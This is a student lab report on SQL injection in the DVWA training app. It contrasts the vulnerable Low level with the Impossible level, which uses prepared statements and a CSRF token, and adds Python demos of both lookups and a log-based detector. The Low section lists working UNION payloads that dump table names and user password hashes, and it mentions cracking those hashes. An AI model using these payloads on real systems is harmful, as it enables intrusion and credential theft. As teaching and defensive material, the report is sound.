Class: IA1603
Name: Nguyen Hong Thai
Roll number: SE161457
SQL Injection – DVWA
1. Introduction
- SQL injection is a cybersecurity threat where malicious individuals exploit vulnerabilities in
web applications by injecting malicious SQL code. This can lead to unauthorized access, data
theft, or even full control of a database.
- In this lab, the system asks the user to input an ID and returns the matching information from the database.
2. Preparation
- A computer running Windows, with all firewalls disabled.
- Download XAMPP, and DVWA from GitHub.
- Two machines: Windows 7 and Kali Linux.
3. Level Low
- Analysis:
+ Lack of user input validation and handling: In the code, user input ($id) is used in an
SQL query without any form of validation or sanitization. This means that users can
input any value, including special characters or SQL characters like ' or ;, which can be
used to launch SQL injection attacks.
+ Use of meta-characters to execute unauthorized SQL commands: With the ability to
input any value for $id, an attacker can use SQL operators like ' OR 1=1; -- to trick the
SQL query. In this case, the SQL query is altered to return all data in the users table.
Specifically, the original query:
SELECT first_name, last_name FROM users WHERE user_id = '$id';
After the attack, it becomes:
SELECT first_name, last_name FROM users WHERE user_id = '' OR 1=1; --';
- Attack:
+ Payload: 1'or'1'='1 (displays all records)
+ Payload: display database version
%'or'1'='1' union select null, version() #
+ Payload: display database user
%'or'1'='1' union select null, user() #
+ Payload: display database name
%'or'1'='1' union select null, database() #
(We notice in the last display line that DVWA is the name of the database)
+ Payload: display all table information in information_schema
%'or'1'='1' union select null, table_name from information_schema.tables #
+ Payload: display all the user tables in information_schema
%'or'1'='1' union select null, table_name from information_schema.tables where table_name like 'user%'#
+ Payload: display all the column fields in the information_schema users table
%'or'1'='1' union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
+ Payload: display the contents of all column fields in the users table
%'or'1'='1' union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
=> I save all the accounts and crack them with crackstation.net.
4. Level Impossible
- Analysis:
+ Validate the user input:
The user input ($id) is first checked to ensure it's a numeric value using the
is_numeric() function. This is a form of input validation that restricts input to numeric
values, which is a good practice to prevent SQL injection.
+ Use of meta-characters to prevent unauthorized SQL commands:
Since the code checks if $id is numeric and uses a prepared statement with
parameter binding, it effectively prevents SQL injection. Even if an attacker tries to inject
SQL commands like ' OR 1=1; --, the use of parameter binding ensures that the input is
treated as data and not executable SQL code. The prepared statement only allows valid
integer values for the user_id, making it resistant to SQL injection.
+ Anti-CSRF Protection:
The code implements anti-CSRF protection by checking a user token
($_REQUEST['user_token']) against a session token ($_SESSION['session_token']). This
helps prevent Cross-Site Request Forgery (CSRF) attacks, ensuring that the request
comes from a legitimate and authenticated source.
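To make the contrast between the two levels concrete, the following is an added Python model of the two lookups; it is not DVWA's PHP code. It builds an in-memory SQLite table with constructed rows, uses str.isdigit() as a stand-in for PHP's is_numeric(), binds the ID as a query parameter, and compares the request token with the session token using hmac.compare_digest() for the anti-CSRF step. The report's 1'or'1'='1 payload returns every row from the Low lookup and is rejected by the Impossible lookup before any SQL runs.

```python
"""Low vs. Impossible user lookup, modelled on an in-memory SQLite table.

Added example, not DVWA's own PHP code. The table layout and rows are
constructed to mirror the report's query (user_id, first_name, last_name);
the checks in lookup_impossible() follow the report's description (numeric
check, bound parameter, CSRF token comparison), not DVWA's source verbatim.
"""
import hmac
import secrets
import sqlite3

# Constructed sample rows; not real DVWA data.
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
]


def make_db():
    """Build the in-memory users table used by both lookups."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, "
        "first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_low(conn, user_input):
    """Low level: $id is spliced into the query text, so a quote character
    in the input changes the SQL statement itself."""
    query = (
        "SELECT first_name, last_name FROM users "
        f"WHERE user_id = '{user_input}'"
    )
    return conn.execute(query).fetchall()


def lookup_impossible(conn, user_input, user_token, session_token):
    """Impossible level as the report describes it."""
    # 1. Anti-CSRF: the request token must equal the session token. A
    #    constant-time compare avoids leaking the token through timing.
    if not hmac.compare_digest(user_token, session_token):
        raise PermissionError("CSRF token mismatch")
    # 2. Input validation. str.isdigit() is a stricter stand-in for PHP's
    #    is_numeric(), which would also accept floats and exponents.
    if not user_input.isdigit():
        raise ValueError("user_id must be numeric")
    # 3. Prepared statement: the value travels as a bound parameter, never
    #    as SQL text, so quote characters cannot alter the statement.
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ? LIMIT 1",
        (int(user_input),),
    ).fetchall()


# Payload taken from the report's Low-level attack section.
TAUTOLOGY = "1'or'1'='1"


def run_demo():
    """Exercise both lookups and return the outcomes as a dict."""
    conn = make_db()
    token = secrets.token_hex(16)  # stands in for $_SESSION['session_token']
    out = {
        "low_normal": lookup_low(conn, "2"),
        "low_tautology_rows": len(lookup_low(conn, TAUTOLOGY)),
        "impossible_normal": lookup_impossible(conn, "2", token, token),
    }
    try:
        lookup_impossible(conn, TAUTOLOGY, token, token)
        out["impossible_tautology"] = "accepted"
    except ValueError as exc:
        out["impossible_tautology"] = f"rejected: {exc}"
    try:
        lookup_impossible(conn, "2", "forged-token", token)
        out["impossible_bad_token"] = "accepted"
    except PermissionError as exc:
        out["impossible_bad_token"] = f"rejected: {exc}"
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Running the script shows the Low lookup returning one row for a normal ID and all three rows for the tautology payload, while the Impossible lookup answers the normal ID and rejects both the payload and a forged CSRF token.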
5. Comparison
Each security requirement below is compared for the Low and Impossible levels.
- Input Validation:
+ Low: Input is not validated or sanitized, allowing any value including special and SQL characters.
+ Impossible: User input ($id) is checked with is_numeric() to ensure it's a numeric value, preventing non-numeric input.
- Protection against SQL Injection:
+ Low: Vulnerable to SQL injection attacks as it directly includes user input in SQL queries.
+ Impossible: Protected against SQL injection by using prepared statements with parameter binding. Input is treated as data, not executable SQL code.
- Use of Meta-Characters in SQL:
+ Low: Vulnerable to SQL injection using meta-characters like ' OR 1=1; --.
+ Impossible: Prevents unauthorized SQL commands by treating input as data, and only allows valid integer values for user_id.
- Anti-CSRF Protection:
+ Low: No mention of CSRF protection.
+ Impossible: Implements anti-CSRF protection by checking user and session tokens, preventing CSRF attacks.
6. Recommendation
- Use Prepared Statements (Parameterized Queries): Prepared statements are a robust defense
against SQL injection. They separate SQL code from user input. Most modern
web programming languages and database libraries support prepared statements.
- Input Validation: Validate user input to ensure it matches the expected format and type. Reject
input that doesn't meet your criteria. However, don't rely solely on input validation as it's not a
complete defense against SQL injection.
- Escaping User Input: If you can't use prepared statements, ensure that user input is properly
escaped before including it in SQL queries. Most programming languages offer functions or
libraries to handle this.
- Least Privilege Principle: Ensure that your database user accounts have the least privilege
necessary. Don't use a superuser account for normal application operations. Limit access to only
the required tables and operations.
- Web Application Firewall (WAF): Consider using a WAF to filter and block malicious
requests before they reach your application. WAFs can help detect and prevent various types of
attacks, including SQL injection.
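As an added example of the detection side of the WAF recommendation (not code from the report or from DVWA), the following Python script scans constructed access-log lines for the query-string patterns used in section 3 and reports which rule each request matched. The path /app/lookup, the IP addresses, the timestamps and the rule set are illustrative assumptions, not values taken from a real deployment.

```python
"""Pattern-based detector for SQL injection probes in web access logs.

Added example; not code from the report or from DVWA. The log lines below
are constructed (Common Log Format, placeholder path /app/lookup) and the
rules illustrate what a WAF or log monitor would match; they are not a
complete ruleset.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines: a benign lookup, two requests carrying the
# payloads discussed in the report, and another benign lookup.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /app/lookup?id=1&Submit=Submit HTTP/1.1" 200 4523
192.0.2.10 - - [10/Oct/2023:13:55:40 +0000] "GET /app/lookup?id=1%27or%271%27%3D%271&Submit=Submit HTTP/1.1" 200 9870
192.0.2.10 - - [10/Oct/2023:13:55:52 +0000] "GET /app/lookup?id=%25%27or%271%27%3D%271%27+union+select+null%2Cversion%28%29+%23&Submit=Submit HTTP/1.1" 200 5102
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /app/lookup?id=3&Submit=Submit HTTP/1.1" 200 4519
"""

# Common Log Format: client, ident, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is checked against the URL-decoded parameter value.
RULES = {
    "tautology": re.compile(r"'\s*or\s*'", re.I),
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "schema_probe": re.compile(r"information_schema", re.I),
    "db_fingerprint": re.compile(r"\b(?:version|user|database)\s*\(\s*\)", re.I),
}


def scan_value(value):
    """Return the names of every rule the decoded value matches."""
    return [name for name, rx in RULES.items() if rx.search(value)]


def scan_log(text):
    """Parse each log line, decode its query string and report rule hits."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real monitor would count these
        query = urlsplit(m["target"]).query
        # parse_qs turns '+' into spaces and percent-decodes, so the rules
        # see the same text the database would have received.
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                hits = scan_value(value)
                if hits:
                    findings.append({
                        "line": lineno, "ip": m["ip"], "param": param,
                        "value": value, "rules": hits,
                    })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['ip']} {f['param']}={f['value']!r} -> {f['rules']}")
```

Decoding before matching matters: the third log line only contains the literal text "union select" after %25, %27 and + are decoded, which is why the scan works on parse_qs output rather than on the raw request line. A rule set like this belongs in front of the application as a second layer, not as a replacement for the prepared statements and validation recommended above.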